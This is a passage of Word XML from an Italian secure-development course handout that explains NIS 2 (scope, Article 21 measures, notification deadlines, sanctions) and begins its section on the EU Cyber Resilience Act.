        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Network and Information Security 2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) è il quadro europeo sulla sicurezza dei sistemi informatici. Sostituisce la NIS 1 del 2016, ampliandone enormemente l’ambito. In Italia è stata recepita con il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Decreto Legislativo 138/2024</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, in vigore dal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">16 ottobre 2024</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’autorità competente in Italia è l’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ACN — Agenzia per la Cybersicurezza Nazionale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(acn.gov.it).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La NIS 1 si applicava solo a poche centinaia di operatori critici (grandi banche, gestori di reti elettriche, ospedali principali). La NIS 2 estende l’obbligo a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">decine di migliaia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di organizzazioni in Italia, divise in due categorie:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1031"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Soggetti essenziali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: energia, trasporti, banche e mercati finanziari, sanità, acqua potabile, infrastrutture digitali (cloud provider, data center), pubblica amministrazione, spazio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1031"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Soggetti importanti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: servizi postali, gestione rifiuti, produzione e distribuzione di sostanze chimiche, produzione alimentare, manifattura di dispositivi medici, motori e veicoli, fornitori di servizi digitali (motori di ricerca, piattaforme di e-commerce).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In generale ricadono sotto NIS 2 le organizzazioni con almeno 50 dipendenti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con fatturato annuo superiore a 10 milioni di euro che operano nei settori sopra elencati. Significa che rientrano molte PMI italiane che fino al 2024 non avevano obblighi di cybersecurity formalizzati.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="93"/>
    <w:bookmarkStart w:id="94" w:name="Xb2b69f10ca5969a6072997f5d0992be2e182779"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Articolo 21 — Misure di sicurezza obbligatorie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’articolo 21 della NIS 2 elenca le misure tecniche e organizzative che ogni soggetto interessato deve adottare. È la parte che riguarda direttamente lo sviluppatore. Le misure obbligatorie sono:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1032"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Politiche di analisi dei rischi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e di sicurezza dei sistemi informativi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1032"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Gestione degli incidenti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(rilevazione, risposta, recupero)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1032"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Continuità operativa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: gestione dei backup, procedure di ripristino, gestione delle crisi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1032"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Sicurezza della catena di approvvigionamento</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(in inglese</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">supply chain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">): include la sicurezza delle componenti software di terze parti — vedremo questo tema nel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_9" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:bCs/>
            <w:b/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 9</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1032"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Sicurezza nell’acquisizione, sviluppo e manutenzione di sistemi informativi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, comprese la gestione e divulgazione delle vulnerabilità — questo è esattamente il dominio di chi scrive codice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1032"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Politiche e procedure per valutare l’efficacia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">delle misure di sicurezza</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1032"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Pratiche di igiene cibernetica</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di base e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">formazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in materia di sicurezza informatica</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1032"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Politiche e procedure relative all’uso della</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">crittografia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e, se opportuno, della cifratura</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1032"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Sicurezza delle risorse umane</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, politiche di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">controllo degli accessi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, gestione degli asset</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1032"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Uso di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">autenticazione a più fattori</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o di soluzioni di autenticazione continua</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I punti 4, 5, 8 e 10 sono direttamente operativi per lo sviluppatore: significano</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">prepared statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">contro la SQL injection (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), controllo di autorizzazione robusto (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 6</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), bcrypt invece di MD5 (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 7</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), 2FA al login. Le scelte tecniche di questo corso non sono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">best practice consigliate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: per le aziende soggette a NIS 2 sono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">adempimenti normativi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="94"/>
    <w:bookmarkStart w:id="95" w:name="Xb09493418db2dcbf91c69152cfb50842e473897"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Articolo 23 — Obblighi di notifica degli incidenti</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quando un’organizzazione soggetta a NIS 2 subisce un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">incidente significativo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(cioè un evento che compromette in modo rilevante la disponibilità, l’integrità o la riservatezza dei sistemi), deve notificarlo all’ACN secondo tempistiche stratificate:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1033"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Entro 24 ore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(pre-allarme): notifica iniziale, anche con informazioni parziali</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1033"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Entro 72 ore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: notifica completa con valutazione di gravità, indicatori di compromissione, impatto stimato</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1033"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Entro 1 mese</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: relazione finale dettagliata con causa radice identificata, misure adottate, impatto effettivo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sono tempistiche più stringenti di quelle del GDPR. Per rispettarle servono — di nuovo — log centralizzati, sistemi di monitoraggio (SIEM), procedure di risposta agli incidenti già scritte e provate prima dell’incidente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SIEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Security Information and Event Management</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Sistema centralizzato che raccoglie i log di tutti i componenti di un’infrastruttura (server, firewall, applicazioni, database) e applica regole di correlazione per identificare automaticamente eventi sospetti. Esempi noti: Splunk, Wazuh (open source), IBM QRadar, Microsoft Sentinel.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="95"/>
    <w:bookmarkStart w:id="96" w:name="sanzioni-nis-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sanzioni NIS 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le sanzioni amministrative previste dalla NIS 2 sono:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1034"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Soggetti essenziali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: fino a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">10 milioni di euro o il 2% del fatturato annuo mondiale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(il maggiore dei due)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1034"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Soggetti importanti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: fino a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">7 milioni di euro o l’1,4% del fatturato annuo mondiale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(il maggiore dei due)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In più, e questo è l’aspetto innovativo: la NIS 2 prevede la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">responsabilità degli organi di amministrazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. In casi gravi, l’autorità può disporre la temporanea interdizione delle persone fisiche che ricoprono funzioni dirigenziali in seno al soggetto inadempiente. Il manager non è più dietro lo schermo dell’azienda.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="96"/>
    <w:bookmarkEnd w:id="97"/>
    <w:bookmarkStart w:id="102" w:name="cyber-resilience-act-cra"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="464" w:name="sec_2_4"/>
      <w:r>
        <w:t xml:space="preserve">2.4 Cyber Resilience Act (CRA)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="464"/>
    </w:p>
    <w:bookmarkStart w:id="98" w:name="cosè-e-quando-entra-in-vigore"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cos’è e quando entra in vigore</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cyber Resilience Act</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Regolamento UE 2024/2847) è il primo regolamento europeo che impone requisiti di sicurezza obbligatori ai</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">prodotti con elementi digitali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">venduti nell’Unione Europea. Pubblicato in Gazzetta Ufficiale UE il 23 ottobre 2024, è entrato formalmente in vigore il 10 dicembre 2024, ma la maggior parte degli obblighi si applica a partire dall’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">11 dicembre 2027</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Gli obblighi di notifica delle vulnerabilità sfruttate attivamente entrano in vigore prima, da settembre 2026.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="98"/>
    <w:bookmarkStart w:id="99" w:name="X1e53a9c76831fed0c998d6c6fe86446fa0afe1a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cosa significa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">prodotto con elementi digitali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La definizione del CRA è larga:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">qualsiasi prodotto hardware o software con connettività di rete</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">venduto nel mercato europeo. Significa:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1035"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">elettrodomestici</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">intelligenti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(frigoriferi connessi, termostati Wi-Fi)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1035"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">dispositivi IoT industriali e civili (telecamere di sicurezza, sensori, controllori)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1035"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">applicazioni mobile commerciali</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1035"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sistemi operativi, browser, antivirus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1035"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">software gestionali venduti come licenza commerciale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1035"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">librerie e componenti software distribuiti commercialmente (anche open source, in alcuni casi)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Restano escluse alcune categorie già regolate da altre norme (dispositivi medici, automotive, aviazione) e — punto importante — il software libero distribuito al di fuori di un’attività commerciale.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="99"/>
    <w:bookmarkStart w:id="100" w:name="le-cinque-cose-che-il-cra-impone"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le cinque cose che il CRA impone</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1036"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Secure by design.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">I prodotti devono essere progettati con sicurezza integrata fin dall’inizio, non aggiunta come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">patch</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dopo che sono stati venduti. Questo è esattamente l’approccio che impari in questa dispensa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1036"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SBOM obbligatoria.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ogni prodotto deve essere accompagnato da un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Software Bill of Materials</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ossia una</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">lista completa di tutti i componenti software</w:t>
      </w:r>
      <w:r>
